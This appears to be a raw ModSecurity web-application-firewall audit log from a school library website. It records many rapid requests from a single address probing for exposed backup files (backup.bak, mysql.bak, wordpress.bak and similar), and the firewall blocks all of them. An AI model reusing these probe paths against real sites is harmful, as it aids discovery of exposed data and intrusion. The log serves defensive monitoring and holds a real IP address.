X-Varnish: 127933788 --0fe9ee55-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --0fe9ee55-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855129527 4986 (- - -) Stopwatch2: 1747543855129527 4986; combined=2680, p1=2349, p2=306, p3=0, p4=0, p5=25, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0fe9ee55-Z-- --1030b44c-A-- [18/May/2025:11:50:55 +0700] aClnL0PRqak7bVuUS6cSDQAAAJM 103.236.140.4 54940 103.236.140.4 8181 --1030b44c-B-- GET /erpustakaansmkn22jakartaschid.backup HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36 OPR/52.0.2871.64 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151552006 --1030b44c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1030b44c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855124568 11528 (- - -) Stopwatch2: 1747543855124568 11528; combined=657, p1=328, p2=298, p3=0, p4=0, p5=31, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1030b44c-Z-- --a7663961-A-- [18/May/2025:11:50:55 +0700] aClnL1ewLfDrCkDGIGxdPQAAAMU 103.236.140.4 53750 103.236.140.4 8181 --a7663961-B-- GET /backup.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75 Safari/537.36 OPR/54.0.2952.64 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 152240134 --a7663961-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a7663961-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855107079 29160 (- - -) Stopwatch2: 1747543855107079 29160; combined=751, p1=395, p2=329, p3=0, p4=0, p5=26, sr=83, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a7663961-Z-- --b887a567-A-- [18/May/2025:11:50:55 +0700] aClnL_ypzAd0elWOk7o73QAAAAA 103.236.140.4 55652 103.236.140.4 8181 --b887a567-B-- GET /smkn22jakartaschid.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36 OPR/55.0.2994.37 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 153616387 --b887a567-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --b887a567-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855121529 15309 (- - -) Stopwatch2: 1747543855121529 15309; combined=13919, p1=13567, p2=325, p3=0, p4=0, p5=27, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b887a567-Z-- --21b8bd11-A-- [18/May/2025:11:50:55 +0700] aClnL1ewLfDrCkDGIGxdPwAAANc 103.236.140.4 54058 103.236.140.4 8181 --21b8bd11-B-- GET /2015.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.137 Safari/537.36 OPR/50.0.2762.67 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 153452547 --21b8bd11-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --21b8bd11-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855132747 4734 (- - -) Stopwatch2: 1747543855132747 4734; combined=1038, p1=603, p2=406, p3=0, p4=0, p5=29, sr=242, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --21b8bd11-Z-- --cad53614-A-- [18/May/2025:11:50:55 +0700] aClnLxir-GlPrFVVKe5EGwAAAEo 103.236.140.4 55628 103.236.140.4 8181 --cad53614-B-- GET /test.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.2.2) Gecko/20100101 Firefox/60.2.2 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 153026563 --cad53614-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --cad53614-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855116234 22053 (- - -) Stopwatch2: 1747543855116234 22053; combined=666, p1=328, p2=311, p3=0, p4=0, p5=26, sr=81, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cad53614-Z-- --25bf1504-A-- [18/May/2025:11:50:55 +0700] aClnLxir-GlPrFVVKe5EIwAAAEk 103.236.140.4 55428 103.236.140.4 8181 --25bf1504-B-- GET /js.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683 Safari/537.36 OPR/57.0.3098.91 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 149880838 --25bf1504-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --25bf1504-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855137155 3205 (- - -) Stopwatch2: 1747543855137155 3205; combined=582, p1=307, p2=256, p3=0, p4=0, p5=19, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --25bf1504-Z-- --9c43cb1a-A-- [18/May/2025:11:50:55 +0700] aClnL1ewLfDrCkDGIGxdSAAAANE 103.236.140.4 55616 103.236.140.4 8181 --9c43cb1a-B-- GET /html.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 150634508 --9c43cb1a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --9c43cb1a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855494800 4015 (- - -) Stopwatch2: 1747543855494800 4015; combined=1133, p1=753, p2=352, p3=0, p4=0, p5=28, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9c43cb1a-Z-- --b4202910-A-- [18/May/2025:11:50:55 +0700] aClnLxir-GlPrFVVKe5EKQAAAEo 103.236.140.4 55586 103.236.140.4 8181 --b4202910-B-- GET /2014.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4; rv:67.0.2) Gecko/20100101 Firefox/67.0.2 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 118849551 --b4202910-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --b4202910-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855497272 4100 (- - -) Stopwatch2: 1747543855497272 4100; combined=965, p1=415, p2=514, p3=0, p4=0, p5=35, sr=89, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b4202910-Z-- --1f492233-A-- [18/May/2025:11:50:55 +0700] aClnLxir-GlPrFVVKe5ELwAAAEA 103.236.140.4 55666 103.236.140.4 8181 --1f492233-B-- GET /files.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2; rv:52.5.3) Gecko/20100101 Firefox/52.5.3 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 150175753 --1f492233-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1f492233-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855500800 4929 (- - -) Stopwatch2: 1747543855500800 4929; combined=3572, p1=996, p2=2543, p3=0, p4=0, p5=32, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1f492233-Z-- --1394b51e-A-- [18/May/2025:11:50:55 +0700] aClnL0PRqak7bVuUS6cSKAAAAIo 103.236.140.4 54980 103.236.140.4 8181 --1394b51e-B-- GET /aspx.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.116 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 154337283 --1394b51e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1394b51e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855504448 6898 (- - -) Stopwatch2: 1747543855504448 6898; combined=976, p1=554, p2=387, p3=0, p4=0, p5=35, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1394b51e-Z-- --e0ff420f-A-- [18/May/2025:11:50:55 +0700] aClnL1ewLfDrCkDGIGxdXgAAAMI 103.236.140.4 54330 103.236.140.4 8181 --e0ff420f-B-- GET /wordpress.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1; rv:58.0.2) Gecko/20100101 Firefox/58.0.2 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 150634511 --e0ff420f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e0ff420f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855507614 5340 (- - -) Stopwatch2: 1747543855507614 5340; combined=803, p1=389, p2=382, p3=0, p4=0, p5=31, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e0ff420f-Z-- --7b888c76-A-- [18/May/2025:11:50:55 +0700] aClnL0PRqak7bVuUS6cSEwAAAIg 103.236.140.4 55456 103.236.140.4 8181 --7b888c76-B-- GET /code.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0 Safari/537.36 OPR/58.0.3135.127 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 153812995 --7b888c76-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --7b888c76-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855494942 19745 (- - -) Stopwatch2: 1747543855494942 19745; combined=808, p1=391, p2=388, p3=0, p4=0, p5=28, sr=90, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7b888c76-Z-- --22274b58-A-- [18/May/2025:11:50:55 +0700] aClnL1ewLfDrCkDGIGxdXwAAAMw 103.236.140.4 54904 103.236.140.4 8181 --22274b58-B-- GET /index.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 143836262 --22274b58-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --22274b58-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855510927 3933 (- - -) Stopwatch2: 1747543855510927 3933; combined=2592, p1=2191, p2=369, p3=0, p4=0, p5=32, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --22274b58-Z-- --96b03425-A-- [18/May/2025:11:50:55 +0700] aClnL0PRqak7bVuUS6cSLgAAAJM 103.236.140.4 55480 103.236.140.4 8181 --96b03425-B-- GET /old.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 152666118 --96b03425-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --96b03425-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855513180 1977 (- - -) Stopwatch2: 1747543855513180 1977; combined=715, p1=363, p2=320, p3=0, p4=0, p5=32, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --96b03425-Z-- --d775cb1f-A-- [18/May/2025:11:50:55 +0700] aClnL0PRqak7bVuUS6cSLwAAAIU 103.236.140.4 55668 103.236.140.4 8181 --d775cb1f-B-- GET /mysql.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729 Safari/537.36 OPR/57.0.3098.106 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 149979145 --d775cb1f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d775cb1f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855513476 2129 (- - -) Stopwatch2: 1747543855513476 2129; combined=819, p1=411, p2=379, p3=0, p4=0, p5=29, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d775cb1f-Z-- --ea8a2d3d-A-- [18/May/2025:11:50:55 +0700] aClnL_ypzAd0elWOk7o7_AAAABE 103.236.140.4 55680 103.236.140.4 8181 --ea8a2d3d-B-- GET /erpustakaansmkn22jakartaschid.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 OPR/56.0.3051.116 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 117910677 --ea8a2d3d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ea8a2d3d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855507864 8246 (- - -) Stopwatch2: 1747543855507864 8246; combined=6544, p1=6112, p2=404, p3=0, p4=0, p5=27, sr=95, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 